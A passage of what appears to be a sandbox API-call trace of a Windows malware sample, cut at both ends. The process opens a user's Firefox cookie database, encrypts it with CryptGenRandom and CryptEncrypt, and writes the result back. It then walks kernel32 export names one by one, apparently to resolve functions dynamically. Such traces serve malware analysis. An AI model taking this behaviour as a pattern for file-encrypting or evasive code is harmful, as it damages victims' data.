HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" [0080.845] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.846] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=524288) returned 1 [0080.846] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.846] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x37e0000 [0080.846] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.846] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.846] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.900] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.900] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.929] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.929] UnmapViewOfFile (lpBaseAddress=0x37e0000) returned 1 [0080.934] CloseHandle (hObject=0x464) returned 1 [0080.934] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.934] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.944] CloseHandle (hObject=0x0) returned 0 [0080.944] CloseHandle (hObject=0x460) returned 1 [0080.945] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.945] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.945] GetTickCount () returned 0x114cb8a [0080.945] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.945] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.945] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.946] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.946] lstrlenA (lpString="kernel32.dll") returned 12 [0080.946] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.946] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.946] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.946] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.946] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.946] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.946] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.946] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.946] lstrlenA (lpString="ADDATOMA") returned 8 [0080.946] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.946] lstrlenA (lpString="ADDATOMW") returned 8 [0080.946] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.946] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.946] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.946] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.947] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.947] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.947] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.947] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.947] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.947] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.947] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.947] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.947] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.947] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.947] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.947] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.947] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.947] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.947] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.947] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.947] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.947] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.947] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.948] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.948] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.948] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.948] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.948] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.948] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.948] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.948] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.948] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.948] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.948] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.948] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.948] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.948] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.948] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.948] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.948] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.948] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.948] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.949] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.949] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.949] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.949] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.949] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.949] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.949] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.949] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.949] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.949] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.949] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.949] lstrlenA (lpString="BEEP") returned 4 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.949] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.949] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.949] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.949] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.949] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.949] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.949] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.950] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.950] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.950] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.950] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.950] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.950] lstrlenA (lpString="CANCELIO") returned 8 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.950] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.950] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.950] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.950] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.950] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.950] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.950] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.950] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.950] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.950] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.950] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.950] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.950] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.950] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.951] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.951] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.951] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.951] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.951] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.951] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.951] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.951] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.951] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.951] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.951] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.951] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.951] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.951] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.951] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.951] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.951] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.951] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.951] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.952] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.952] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.952] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.952] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.952] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.952] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.952] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.952] 